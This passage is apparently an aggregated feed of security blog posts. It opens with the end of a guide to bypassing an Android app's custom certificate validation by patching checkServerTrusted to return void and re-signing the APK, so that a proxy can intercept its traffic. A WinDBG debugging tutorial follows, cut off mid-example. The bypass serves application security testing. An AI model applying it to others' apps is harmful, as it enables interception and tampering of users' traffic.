In both scenarios, the communication channel cannot be established and the application does not work. To analyze the above mentioned scenarios, fire up Wireshark to analyze SSL handshake between the application and the web proxy. If you don't see any issues in wireshark between the application and the proxy, issued a HTTPS request to the server within the web proxy to see if you have any issues there. If not, then you know the web proxy is capable of performing MiTM for the test application and there is something else going under the hood.

Custom Certificate Validation

At this point you should start to look into the possibility of the application performing custom certificate validation to prevent the possibility of MiTM to monitor/modify its traffic flow. HTTPS clients can perform custom certificate validation by implementing the X509TrustManager interface and then using it for its HTTPS connections. The process of creating HTTPS connections with custom certificate validation is summarized below:

  1. Implement methods of the X509TrustManager interface as required. The server certificate validation code will live inside the checkServerTrusted method. This method will throw an exception if the certificate validation fails or will return void otherwise.
  2. Obtain a SSLContext instance.
  3. Create an instance of the X509TrustManager implementation and use it to initialize SSLContext.
  4. Obtain SSLSocketFactory from the SSLContext instance.
  5. Provide the SSLSocketFactory instance to setSSLSocketFactory method of the HttpsURLConnection.
  6. Instance of HttpsURLConnection class will then communicate with the server and will invoke checkServerTrusted method to perform custom server certificate validation.
So, if you can decompile the code and search through it, you'll likely reveal the X509TrustManager implementation in one of the core security classes of the application. The next step is to patch the code preventing the MiTM and deploy it for testing. The image below shows two methods implemented for X509TrustManager from an example application.



Modifying checkServerTrusted Implementation

The example image above shows implementation for two X509TrustManager methods, checkServerTrusted and checkClientTrusted. At this point it is important to point out that in the example above, both the methods behave in a similar way except that the former is used by client side code and the latter is used by server side code. If the certificate validation fails, the methods will throw an exception, otherwise they return void.

The checkClientTrusted implementation above allows the server side code to validate client certificate. Since this functionality is not required inside the mobile application, this method can be empty and return void for the test application; which is equivalent to successful validation. However, the checkServerTrusted contains significant chunk of code performing the custom certificate validation which needs to be bypassed.

To bypass certificate validation code inside the checkServerTrusted method for this example, I replaced its Dalvik code with the code from the checkClientTrusted method to return void, effectively bypassing the custom certificate check as shown in the image below.



Recompiling and Deploying the Modified Application

Once you have all the checkServerTrusted invocations from set up to be successful, recompile the application with apkTool, sign it with SignApk and deploy it on the device. If you did it all right, the web proxy MiTM will work like a charm and you will be able view, modify and fuzz application traffic.

Getting Started with WinDBG - Part 1

$
0
0
By Brad Antoniewicz.

WinDBG is an awesome debugger. It may not have a pretty interface or black background by default, but it still one of the most powerful and stable Windows debuggers out there. In this article I'll introduce you to the basics of WinDBG to get you off the ground running.

In this blog post we'll cover installing and attaching to a process, then in the next blog post we'll go over breakpoints, stepping, and inspecting memory.

Installation

Microsoft has changed things slightly in WinDBG's installation from Windows 7 to Windows 8. In this section we'll walk through the install on both.

Windows 8

For Windows 8, Microsoft includes WinDBG in the Windows Driver Kit (WDK) You can install Visual Studio and the WDK or just install the standalone "Debugging Tools for Windows 8.1" package that includes WinDBG.

This is basically a thin installer that needs to download WinDBG after you walk through a few screens. The install will ask you if you'd like to install locally or download the development kit for another computer. The later will be the equivalent of an offline installer, which is my preference so that you can install on other systems easily in the future.



From there just Next your way to the features page and deselect everything but "Debugging Tools for Windows" and click "Download".



Once the installer completes you can navigate to your download directory, which is c:\Users\Username\Downloads\Windows Kits\8.1\StandaloneSDK by default, and then next through that install. Then you're all ready to go!

Windows 7 and Below

For Windows 7 and below, Microsoft offers WinDBG as part of the "Debugging Tools for Windows" package that is included within the Windows SDK and .Net Framework. This requires you to download the online/offline installer, then specifically choose the "Debugging Tools for Windows" install option.

My preference is to check the "Debugging Tools" option under "Redistributable Packages" and create a standalone installer which makes future debugging efforts a heck of lot easier. That's what I'll do here.



Once the installation completes, you'll should have the redistributable for various platforms (x86/x64) in the c:\Program Files\Microsoft SDKs\Windows\v7.1\Redist\Debugging Tools for Windows\ directory.



From there the installation is pretty simple, just copy the appropriate redistributable to the system you're debugging and then click through the installation.

Interface

When you run WinDBG for the first time, you'll realize that its intimidatingly simple. Most of WinDBG's interface is experienced while you're actually debugging a process. So you're not going to do to much with WinDBG until you attach it to a process. Rather then having a section dedicated to the interface (too late!) we'll point out the important parts in the upcoming sections.

The most basic thing about the interface you should know is the Command window. It's the default window opened once you're attached to a process. The Command window is mostly an output only window, with a small input field on the bottom which you'll enter commands into to control WinDBG.



Symbols

WinDBG doesn't really need much of a configuration, most things work right out of the box. The one important thing to do is set up Symbols. Symbols are basically special files that are generated with the program binary at compile time that provide debugging information such as function and variable names. This can really help demystify a lot of the functionality of an application when debugging or disassembling. Many Microsoft components are compiled with Symbols which are distributed via the Microsoft Symbol Server. For non-Microsoft binaries, you're usually out of luck - sometimes you'll find them laying around somewhere but mostly all companies keep that stuff protected.

To configure WinDBG to use the Microsoft Symbol server go to File:Symbol File Path and set the path appropriately to the one below. The syntax is a little weird, asterisks are the delimiter, so in the value below, we'll download symbols to the C:\Symbols directory.

SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols




WinDBG will automatically load Symbols for binaries that it has them for when needed. To add a file containing symbols you can just append it to the path:

SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols;c:\SomeOtherSymbolFolder


Adding Symbols during Debugging

If you do run into a situation where you have Symbols and would like to import them while the debugging, you can do so via the .sympath command option within the command window (this requires you to be attached to a process). For instance to append c:\SomeOtherSymbolFolder you can:

0:025> .sympath+ c:\SomeOtherSymbolFolder
Symbol search path is: SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols;c:\SomeOtherSymbolFolder
Expanded Symbol search path is: srv*c:\symbols*http://msdl.microsoft.com/download/symbols;c:\someothersymbolfolder


It's always good to reload the symbols after you make changes to the path:

0:025> .reload
Reloading current modules
................................................................
...............................................


Checking Symbols

To view what modules have symbols loaded, you can use the x*! command. However, WinDBG doesn't load Symbols until it needs them so x*! will show most of the module symbols are deferred. We can force WinDBG to load symbols, with the ld * command (which may take a little time, you can stop it by going to Debug:Break):



Now we can view the symbols for each for the modules:



Debugging a Local Process

You have a couple options when debugging a local process. You can start the process then attach to it, or have WinDBG launch the process for you. I'm really sure of all the advantages/disadvantages of each - I know that when you launch a program with WinDBG, it enables some special debugging options (e.g. debug heap) that the program may not like, and it will crash. That being said, there are also programs that will crash when you attach the debugger, so ymmv. Some applications (malware in particular) will look for the presence of the debugger at launch and may not later on, which would be a reason why you'd attach. And sometimes you're debugging a service that is controlled by Windows which sets up a variety of things during its launch, so to simplify things, you'd attach rather then launch via the debugger. Some people say there is a significant performance impact when launching a process via the debugger. Test it out yourself, and see what works best for you. If you have any particular reasons why you'd do one over the other, please let me know the comments!

Starting a Process

If you're debugging a self contained application that just runs locally and doesn't communicate via the network, you may want to have WinDBG start the application. However, that's not to say you can't attach to these programs after they've been launched.

Starting a process is pretty straight forward, go to "File:Open Executable". From there, select the executable you'd like to debug. You can also provide command line arguments and define the start directory:



Attaching to a Process

Attaching to an already running process is just as simple. Note, that in some cases, you'll need to need to spend a little time identifying the true process you're looking to target. For instance, some web browsers will create one parent process, then an additional process for each tab. So depending on the crash you're debugging, you might want to attach to the tab process rather than the parent.

To attach to an already existing process, go to "File:Attach to a Process" then select the PID or process name to attach to. Keep in mind you'll also need the appropriate rights to attach to your target process.



If the program has stopped responding, you can noninvasively by using the "Noninvaise" checkbox.

Debugging a Remote Process

Now there may be times where you have to debug a process on a remote system. For instance, it may just be more convenient to use a local debugger rather than one within a VM or via RDP. Or perhaps you are debugging LoginUI.exe - which is only available while the system is locked. In these situations you can have a local WinDBG instance running then remotely connect to it. There are a couple ways to do this as well - we'll cover two of the most common ways.

Existing Debugging Sessions

If you've already started to debug the program locally (via attaching or launching mentioned above) you can use the command input field to have WinDBG launch a listener that a remote debugger can connect to. This is done with the .server command:

.server tcp:port=5005


You'll likely get a security alert that you should allow:



Then a positive message within WinDBG telling you the server has started:

0:005> .server tcp:port=5005
Server started. Client can connect with any of these command lines
0: <debugger> -remote tcp:Port=5005,Server=USER-PC


Then from the remote host, you can connect to the existing debugging session via "File:Connect to a Remote Session":



tcp:Port=5005,Server=192.168.127.138


Once connected you'll get a confirmation on remote client:

Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.

Server started. Client can connect with any of these command lines
0: <debugger> -remote tcp:Port=5005,Server=USER-PC
MACHINENAME\User (tcp 192.168.127.138:13334) connected at Mon Dec 16 09:03:03 2013



and the locally debugging instance:

MACHINENAME\User (tcp 192.168.127.138:13334) connected at Mon Dec 16 09:03:03 2013



Remote Server

You can also have a standalone WinDBG server running on a system, remotely connect to it, then have the ability to select what process to attach to. This can be done using the dbgsrv.exe

executable on the system where the process is (or will be) running:

 dbgsrv.exe -t tcp:port=5005





And you'll likely get a Windows Firewall notice, which you should allow:



From the remote system, you can connect by going to "File: Connect to Remote Stub" and defining the server:

tcp:Port=5005,Server=192.168.127.138


You won't get any obvious indicator that you're connected, but when you go to "File:Attach to a Process", you'll see the process list of the system you're running dbgsrv.exe on. Now you can attach to a process as you normally would as if the process was local.

Help

WinDBG's help system is awesome. As with all new things, you should become familiar with how to get help on a specific command or concept. From the command input you can use the .hh command to access WinDBG's help:

windbg> .hh 


You can also use .hh on a specific command. For instance, to get more information on the .reload command, you can use:

windbg> .hh .reload


Or just go to "Help:Contents".

Modules

As program runs it pulls in a number of modules that provide functionality - thus if you're able to gain insight into what modules are imported by the application, it can help identify what the application does and how it may work. In many scenarios, you'll be debugging a particular module loaded by a program, rather than the program executable itself.

When you attach to process, WinDBG will automatically list the loaded modules, for instance, here's what WinDBG's output when I attached to calc.exe:

Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00a70000 00b30000 C:\Windows\system32\calc.exe
ModLoad: 77630000 7776c000 C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 77550000 77624000 C:\Windows\system32\kernel32.dll
ModLoad: 75920000 7596a000 C:\Windows\system32\KERNELBASE.dll
ModLoad: 76410000 77059000 C:\Windows\system32\SHELL32.dll
ModLoad: 77240000 772ec000 C:\Windows\system32\msvcrt.dll
ModLoad: 76300000 76357000 C:\Windows\system32\SHLWAPI.dll
ModLoad: 75cd0000 75d1e000 C:\Windows\system32\GDI32.dll
ModLoad: 75fa0000 76069000 C:\Windows\system32\USER32.dll
ModLoad: 777b0000 777ba000 C:\Windows\system32\LPK.dll
ModLoad: 774b0000 7754d000 C:\Windows\system32\USP10.dll
ModLoad: 73110000 732a0000 C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7600.16385_none_72fc7cbf861225ca\gdiplus.dll
ModLoad: 75a80000 75bdc000 C:\Windows\system32\ole32.dll
ModLoad: 76360000 76401000 C:\Windows\system32\RPCRT4.dll
ModLoad: 777c0000 77860000 C:\Windows\system32\ADVAPI32.dll
ModLoad: 75be0000 75bf9000 C:\Windows\SYSTEM32\sechost.dll
ModLoad: 76270000 762ff000 C:\Windows\system32\OLEAUT32.dll
ModLoad: 74590000 745d0000 C:\Windows\system32\UxTheme.dll
ModLoad: 74710000 748ae000 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_421189da2b7fabfc\COMCTL32.dll
ModLoad: 703d0000 70402000 C:\Windows\system32\WINMM.dll
ModLoad: 74c80000 74c89000 C:\Windows\system32\VERSION.dll
ModLoad: 77770000 7778f000 C:\Windows\system32\IMM32.DLL
ModLoad: 75c00000 75ccc000 C:\Windows\system32\MSCTF.dll
ModLoad: 74130000 7422b000 C:\Windows\system32\WindowsCodecs.dll
ModLoad: 74260000 74273000 C:\Windows\system32\dwmapi.dll
ModLoad: 756d0000 756dc000 C:\Windows\system32\CRYPTBASE.dll
ModLoad: 75e60000 75ee3000 C:\Windows\system32\CLBCatQ.DLL
ModLoad: 6ef10000 6ef4c000 C:\Windows\system32\oleacc.dll



Later on in a debugging session you can reproduce these results with the lmf command:

0:005> lmf
start end module name
00a70000 00b30000 calc C:\Windows\system32\calc.exe
6ef10000 6ef4c000 oleacc C:\Windows\system32\oleacc.dll
703d0000 70402000 WINMM C:\Windows\system32\WINMM.dll
73110000 732a0000 gdiplus C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7600.16385_none_72fc7cbf861225ca\gdiplus.dll
74130000 7422b000 WindowsCodecs C:\Windows\system32\WindowsCodecs.dll
74260000 74273000 dwmapi C:\Windows\system32\dwmapi.dll
74590000 745d0000 UxTheme C:\Windows\system32\UxTheme.dll
74710000 748ae000 COMCTL32 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_421189da2b7fabfc\COMCTL32.dll
74c80000 74c89000 VERSION C:\Windows\system32\VERSION.dll
756d0000 756dc000 CRYPTBASE C:\Windows\system32\CRYPTBASE.dll
75920000 7596a000 KERNELBASE C:\Windows\system32\KERNELBASE.dll
75a80000 75bdc000 ole32 C:\Windows\system32\ole32.dll
75be0000 75bf9000 sechost C:\Windows\SYSTEM32\sechost.dll
75c00000 75ccc000 MSCTF C:\Windows\system32\MSCTF.dll
75cd0000 75d1e000 GDI32 C:\Windows\system32\GDI32.dll
75e60000 75ee3000 CLBCatQ C:\Windows\system32\CLBCatQ.DLL
75fa0000 76069000 USER32 C:\Windows\system32\USER32.dll
76270000 762ff000 OLEAUT32 C:\Windows\system32\OLEAUT32.dll
76300000 76357000 SHLWAPI C:\Windows\system32\SHLWAPI.dll
76360000 76401000 RPCRT4 C:\Windows\system32\RPCRT4.dll
76410000 77059000 SHELL32 C:\Windows\system32\SHELL32.dll
77240000 772ec000 msvcrt C:\Windows\system32\msvcrt.dll
774b0000 7754d000 USP10 C:\Windows\system32\USP10.dll
77550000 77624000 kernel32 C:\Windows\system32\kernel32.dll
77630000 7776c000 ntdll C:\Windows\SYSTEM32\ntdll.dll
77770000 7778f000 IMM32 C:\Windows\system32\IMM32.DLL
777b0000 777ba000 LPK C:\Windows\system32\LPK.dll
777c0000 77860000 ADVAPI32 C:\Windows\system32\ADVAPI32.dll



And you can get the load address for a specific module using the "lmf m" command:

0:005> lmf m kernel32
start end module name
77550000 77624000 kernel32 C:\Windows\system32\kernel32.dll


To get the image header information you can use the !dh extension (the exclamation mark denotes an extension) on a particular module.

0:005> !dh kernel32

File Type: DLL
FILE HEADER VALUES
14C machine (i386)
4 number of sections
4A5BDAAD time date stamp Mon Jul 13 21:09:01 2009

0 file pointer to symbol table
0 number of symbols
E0 size of optional header
2102 characteristics
Executable
32 bit word machine
DLL

OPTIONAL HEADER VALUES
10B magic #
9.00 linker version
C4600 size of code
C800 size of initialized data
0 size of uninitialized data
510C5 address of entry point
1000 base of code
----- new -----
77550000 image base
1000 section alignment
200 file alignment
3 subsystem (Windows CUI)
6.01 operating system version
6.01 image version
6.01 subsystem version
D4000 size of image
800 size of headers
D5597 checksum
00040000 size of stack reserve
00001000 size of stack commit
00100000 size of heap reserve
00001000 size of heap commit
140 DLL characteristics
Dynamic base
NX compatible
B4DA8 [ A915] address [size] of Export Directory
BF6C0 [ 1F4] address [size] of Import Directory
C7000 [ 520] address [size] of Resource Directory
0 [ 0] address [size] of Exception Directory
0 [ 0] address [size] of Security Directory
C8000 [ B098] address [size] of Base Relocation Directory
C5460 [ 38] address [size] of Debug Directory
0 [ 0] address [size] of Description Directory
0 [ 0] address [size] of Special Directory
0 [ 0] address [size] of Thread Storage Directory
816B8 [ 40] address [size] of Load Configuration Directory
278 [ 408] address [size] of Bound Import Directory
1000 [ DE8] address [size] of Import Address Table Directory
0 [ 0] address [size] of Delay Import Directory
0 [ 0] address [size] of COR20 Header Directory
0 [ 0] address [size] of Reserved Directory


SECTION HEADER #1
.text name
C44C1 virtual size
1000 virtual address
C4600 size of raw data
800 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
60000020 flags
Code
(no align specified)
Execute Read


Debug Directories(2)
Type Size Address Pointer
cv 25 c549c c4c9c Format: RSDS, guid, 2, kernel32.pdb
( 10) 4 c5498 c4c98

SECTION HEADER #2
.data name
FEC virtual size
C6000 virtual address
E00 size of raw data
C4E00 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
C0000040 flags
Initialized Data
(no align specified)
Read Write

SECTION HEADER #3
.rsrc name
520 virtual size
C7000 virtual address
600 size of raw data
C5C00 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
40000040 flags
Initialized Data
(no align specified)
Read Only

SECTION HEADER #4
.reloc name
B098 virtual size
C8000 virtual address
B200 size of raw data
C6200 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
42000040 flags
Initialized Data
Discardable
(no align specified)
Read Only




Messages/Exceptions

When you attach to a process, the modules are displayed first, then WinDBG displays any applicable messages. When we attached to calc.exe, WinDBG automatically sets a breakpoint (which is just a marker that tells the debugger uses to pause the execution of a program). So our message is:

(da8.b44): Break instruction exception - code 80000003 (first chance)


This particular message is an exception, specifically a first chance exception. An exception is basically some special condition that occurred during the program's operation. The first chance means that the progam was paused right after the exception occurred. A second chance exception is when an exception has occurred, some programming logic to handle exception was executed, and the program has paused.

Registers

After the messages/exceptions, the debugger will output the state of the CPU's registers. Registers are basically special variables within the CPU that store a small amount of data or keep track of where something is in memory. The CPU can process the data in these registers very quickly, so its faster for the CPU to perform operations on the values in its registers rather then pulling information all the way down the bus from RAM.

WinDBG automatically outputted the following registers after we attached to calc.exe:

eax=7ffd9000 ebx=00000000 ecx=00000000 edx=776cd23d esi=00000000 edi=00000000
eip=77663540 esp=02affd9c ebp=02affdc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246


Later on down the line, we can reproduce this with the r command:

0:005> r
eax=7ffd9000 ebx=00000000 ecx=00000000 edx=776cd23d esi=00000000 edi=00000000
eip=77663540 esp=02affd9c ebp=02affdc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!DbgBreakPoint:
77663540 cc int 3



And if we wanted to just retrieve a value of a specific register, we could by appending the register name:

0:005> r eax
eax=7ffd9000



and multiple registers:

0:005> r eax,ebp
eax=7ffd9000 ebp=02affdc8



Instruction Pointer

The final line is instruction to be executed. This is outputted as part of the r command and is what the EIP register contains. EIP is the instruction pointer, which is the register that contains the location of the next instruction for the CPU to execute. WinDBG's output is equivalent of the u eip L1 command that basically tells WinDBG to go to the memory location pointed to by EIP, treat that memory as assembly, and print out one line.


ntdll!DbgBreakPoint:
77663540 cc int 3


Stay Tuned

In the next blog post we'll cover actually using WinDBG :) - breakpoints, stepping, and looking at memory - stay tuned!

Getting Started with WinDBG - Part 2

$
0
0
By Brad Antoniewicz.

This is a multipart series walking you through using WinDBG - we've gotten you off the ground with our last blog post, and now we'll focus on it's core functionality so that you can start debugging programs!


  • Part 1 - Installation, Interface, Symbols, Remote/Local Debugging, Help, Modules, and Registers
  • Part 2 - Breakpoints
  • Part 3 - Inspecting Memory, Stepping Through Programs, and General Tips and Tricks

Breakpoints

Breakpoints are markers associated with a particular memory address that tell the CPU to pause the program. Because programs can contain millions of assembly instructions, manually stepping through each of those instructions would take an incredibly long time. Breakpoints help speed up debugging time by allowing you to set a marker at a specific function which allows the CPU to automatically execute all the code leading up to that point. Once the breakpoint is reached, the program is paused and the debugging can commence.

Breakpoints can be set in software and within the CPU (hardware), let's take a look at both:

Software Breakpoints

Programs get loaded into memory and executed - which allows us to temporarily modify the memory associated with a program without affecting the actual executable. This is how software breakpoints work. The debugger records assembly instruction where the breakpoint should be inserted, then silently replaces it with an INT 3 assembly instruction (0xcc) that tells the CPU to pause execution. When the breakpoint is reached, the debugger looks at the current memory address, fetches the recorded instruction, and presents it to the user. To the user it appears that the program paused on that instruction however the CPU actually had no idea it ever existed.

Software breakpoints are set within WinDBG using the bp, bm, or bu commands. bp (for Break Point) is arguably the most used breakpoint command. In its most basic use, its only argument is the address at which a breakpoint should be set:

0:001> bp 00e61018 


With bp, the address should be a memory location where executable code exists. While bp works on locations where data is stored, it can cause issues since the debugger is overwriting the data at that address. To be safe Microsoft suggests that if you want to break on a memory location where data is stored, you should use a different breakpoint command (ba, discussed below).

Let's take a look at setting a software breakpoint. Here we'll launch notepad.exe with WinDBG. By default, when the program is launched with WinDBG, it will insert a breakpoint before the entry point of the program is executed and pause the program. First we'll get the location in memory where notepad.exe is loaded:



Next we'll determine the program's entry point by using !dh with the image load address:



Now we'll set a breakpoint at it's entry point (load address + 0x3689):



Finally we'll tell the program to run until it encounters a breakpoint using the g command (more on this later), when the breakpoint is hit, we'll get a notice:



Most of your debugging will likely use software breakpoints, however there are certain scenarios (read-only memory locations, breaking on data access, etc..) where you need to use hardware breakpoints.

Hardware Breakpoints

Within most CPUs there are special debug registers that can be used to store the addresses of breakpoints and specific conditions on which the breakpoint should triggered (e.g. read, write, execute). Breakpoints stored here are called hardware (or processor) breakpoints. There is a very finite number of registers (usually 4) which limits the number of total hardware breakpoints that can be set. When the CPU reaches a memory address defined within the debug register and the access conditions are met, the program will pause execution.

Hardware breakpoints are set within WinDBG using the ba (Break on Access) command. In its most basic usage, it takes 3 attributes:

0:001> ba e 1 00453689 


This command would (we'll see soon why it doesn't) accomplish the same thing as the previous bp example, however now we're setting a hardware breakpoint. The first argument, e, is the type of memory access to break on (execute), while the second is the size (always 1 for execute access). The final is the address. Let's take a look at setting a hardware breakpoint, keep in mind our load addresses are different because of the whole ASLR thing.

Due to the way Windows resets thread contexts and the place where WinDBG breaks after spawning a process, we wont be able to set a breakpoint in the same way we did in our earlier example. Previously we set our breakpoint on the program's entry point, however if we try to do that with WinDBG we get an error:

0:000> lmf m notepad
start end module name
00e60000 00e90000 notepad notepad.exe
0:000> ba e 1 00e63689
^ Unable to set breakpoint error
The system resets thread contexts after the process
breakpoint so hardware breakpoints cannot be set.
Go to the executable's entry point and set it then.
'ba e 1 00e63689'



So in order to get around this, we'll need to use that g command and tell it to run the program until it reaches a specific memory address. This is sort of like setting a software breakpoint in behavior but isn't exactly the same. So we'll tell WinDBG to execute until we enter the program's initial thread context, which will then allow us to set hardware breakpoints.

0:000> g 00e63689
ModLoad: 76be0000 76bff000 C:\Windows\system32\IMM32.DLL
ModLoad: 76c00000 76ccc000 C:\Windows\system32\MSCTF.dll
eax=77081162 ebx=7ffd7000 ecx=00000000 edx=00e63689 esi=00000000 edi=00000000
eip=00e63689 esp=0022fbb4 ebp=0022fbbc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
notepad!WinMainCRTStartup:
00e63689 e8c5f9ffff call notepad!__security_init_cookie (00e63053)



Now we can set our hardware breakpoint:



To confirm we actually set the breakpoint in CPU's registers, we can use the r command (discussed later). We'll use the M attribute to apply a register mask of 0x20:

0:000> rM 20





You'll notice something doesn't look right here, all of the registers contain 0! This is because WinDBG hasn't actually set them yet. You can single step (discussed below) with the p command. Once we do, the dr0 register will have our breakpoint defined:



In this specific example, we probably will never hit our breakpoint because it is in the entry point of the program that we've already reached. However if our breakpoint was on a function that was called a variety of times in the life of the program, or on a memory address where a often used variable was stored, we'd get a "Breakpoint Hit" message when the memory was accessed just as we would with a software breakpoint.

Common Commands

Now that you have the basics of setting breakpoints, there are a handful of other breakpoint related commands that will be useful. Let's look at a couple:

Viewing Set Breakpoints

To view each of the breakpoints that have been set, you can use the bl (Breakpoint List) command.

0:000> bl
0 e 00523689 e 1 0001 (0001) 0:**** notepad!WinMainCRTStartup


Here we have one breakpoint defined, the entry is broken into a few columns:
  • 0 - Breakpoint ID
  • e - Breakpoint Status - Can be enabled or disabled.
  • 00523689 - Memory Address
  • e 1 - Memory address access flags (execute) and size - For hardware breakpoints only
  • 0001 (0001) - Number of times the breakpoint is hit until it becomes active with the total passes in parentheses (this is for a special use case)
  • 0:**** - Thread and process information, this defines it is not a thread-specific breakpoint
  • notepad!WinMainCRTStartup - The corresponding module and function offset associated with the memory address

Deleting Breakpoints

To remove a breakpoint, use the bc command:

0:000> bc 0


The only attribute to bc is the Breakpoint ID (learned from bl). Optionally you can provide * to delete all breakpoints.

Breakpoint Tips

There are a couple simple tips that I commonly use when setting breakpoints. Here are a few of them, please share any you have in the comments below!

Calculated Addresses

The simplest breakpoint tip, is just something that you'll learn when dealing with memory addresses within WinDBG. You can have WinDBG evaluate expressions to calculate address. For instance, in the above examples, we knew the module load address of notepad.exe and the entry point was at offset 0x3689. Rather than calculating that address ourselves, we can have WinDBG do it for us:

0:000> lmf m notepad
start end module name
00770000 007a0000 notepad notepad.exe
0:000> bp 00770000 + 3689
0:000> bl
0 e 00773689 0001 (0001) 0:**** notepad!WinMainCRTStartup



Name and Offset Addresses

One of the great things about Symbols (covered in part 1 of this post) is that they give us the locations of known functions. So we can use the offsets to those known functions as addresses in our breakpoints. To figure out the offset, we can use the u (Unassemble) command within WinDBG. u will take a memory address and interpret the data at that memory address as assembly and display the corresponding mnemonics. As part of its output, u will also provide the offset to the nearest symbol:

0:000> u 00770000 + 3689
notepad!WinMainCRTStartup:
00773689 e8c5f9ffff call notepad!__security_init_cookie (00773053)
0077368e 6a58 push 58h



Now we know that notepad!WinMainCRTStartup is a friendly name for 00770000 + 3689. Since there isn't a numeric offset at the end of this friendly name, we can also infer that Symbols exist for this function. Look what happens when we check out the second instruction in this function:

0:000> u 0077368e 
notepad!_initterm_e+0x61:
0077368e 6a58 push 58h



This time we got a function name, notepad!_initterm_e, plus an offset (+0x61). I'm not entirely sure why WinDBG gave the offset to notepad!_initterm_e instead of notepad!WinMainCRTStartup, probably a symbol search order thing - nonetheless, we could have used a notepad!WinMainCRTStartup offset to reference the same location:

0:000> u notepad!WinMainCRTStartup+0x5
notepad!_initterm_e+0x61:
0077368e 6a58 push 58h



The point is that now we can use this offset as a breakpoint and those offsets are always valid even if ASLR is enabled - so we don't have to waste time calculating addresses at every launch.

0:000> bp notepad!WinMainCRTStartup+0x5
0:000&gt bl
0 e 0077368e 0001 (0001) 0:**** notepad!_initterm_e+0x61



Breaking On Module Load

There may be some occasions when you'd like to set a breakpoint when a module is being loaded. Unfortunately, there doesn't appear to be an obvious way within the standard breakpoint commands to do this (let know if you know of a way in the comments). Instead a sort of "hacky" way to do this is by defining that an exception be raised when a particular module is loaded using the sxe command:

0:000> sxe ld IMM32.DLL



Here we've set up a first chance exception (sxe) when a module is loaded (ld) and defined IMM32.DLL as the specific module which triggers the exception.

We can use sx (Set Exceptions) to view the configured exceptions. If we look under the Load Module list, we'll see that we have a break on IMM32.DLL.



To clear it we can use the sxi (Set Exception Ignore) command:

0:000> sxi ld IMM32.DLL



Executing Commands

There may be certain commands that we execute every time a breakpoint is reached. For instance, say we're always interested at what values are on the stack. We can automate this with WinDBG by building a list of commands and appending it to our breakpoint. In our example, we'll print out some information, and use the dd command (discussed later) to show the stack. Notice how our command is referenced in the bl output as well:

0:000> bp notepad!WinMainCRTStartup ".echo \"Here are the values on the stack:\n\"; dd esp;"
0:000> bl
0 e 00ae3689 0001 (0001) 0:**** notepad!WinMainCRTStartup ".echo \"Here are the values on the stack:\n\"; dd esp;"



Let's see what happens when we hit our breakpoint:



As expected, the commands were executed, showing the "Here are the values on the stack" message and the stack. Commands are chained together with a semi-colon, and be sure to escape quotes within the outer-most quotes that contain the entire command. You can even append the g command to have the commands be executed and the program to just continue. This allows you to inspect the state of the program as it runs rather than manually interrupting it every time a breakpoint is hit.

Stay Tuned

In our next blog post we'll cover inspecting memory and stepping through the program!

Getting Started with WinDBG - Part 3

$
0
0
By Brad Antoniewicz.

In this series of blog posts we've walked you through getting WinDBG installed, setup, and got you started by attaching to a process and setting breakpoints. Our next step is the actual debugging part where we're stepping through a program and looking at memory.

  • Part 1 - Installation, Interface, Symbols, Remote/Local Debugging, Help, Modules, and Registers
  • Part 2 - Breakpoints
  • Part 3 - Inspecting Memory, Stepping Through Programs, and General Tips and Tricks

Stepping

Really the whole reason you're using a debugger is to inspect the state of a process during a specific operation or function. Just about every instruction that gets executed alters the program state in some way which means having the ability to execute an instruction then inspect the state is extremely important. The first part of this is "stepping" - executing instructions then pausing. WinDBG offers a number of different stepping commands depending on where you are in the program and where you want to go.

Most debuggers use the following terms that describe how you can navigate through a program and its functions:

  • Step-Into - When the instruction is a call, follow the call and pause at the first instruction in the called function.
  • Step-Over - When the instruction is a call, execute the function and all subfunctions, pausing at the instruction in the current function after the call.
  • Step-Out - Execute all instructions and pause after the current function is complete (ret at the end of the current function)

A note to make here is that both Step-Into and Step-Over will execute a single instruction and pause - behavior only changes when a call instruction is reached.

Go

The g (Go) command is more of a breakpoint command but its functionality blurs the lines between breakpoints and stepping commands. It's used to resume execution of program but unlike most of the stepping commands, it not really meant to be used on an instruction by instruction basis. g will resume the program until a breakpoint or exception occurs. Really, you would use g to execute all of the instructions up to a breakpoint, whereas with stepping commands you're executing instructions without setting a breakpoint. However, to clarify, debuggers will pause when hitting a breakpoint regardless if you use a stepping command or something like g.

g is straightforward to use:

0:001> g


While the program is running, WinDBG will give you a message in the command input box:



If you know the address you'd like to execute until then just provide it as an argument to g:

0:001> g notepad!WinMainCRTStartup


Single Stepping

Executing a single instruction, then pausing is called Single Stepping. This can be achieved by either using the "Step-Into" or "Step-Over" commands since both behave the same on non-call instructions. Rather then show them both here, let's look at these commands individually.

Step-Into

0:001> t 


To Step-Into with WinDBG, use the t (Trace) command. Each step will show you the state of the registers and the instructions that will be executed. In this example we'll pause at the program's entry point (notepad!WinMainCRTStartup) and look at the first few instructions to be executed (u eip). The first instruction is a call to the notepad!__security_init_cookie function. Let's see how debugger behaves when Stepping-Into with t:



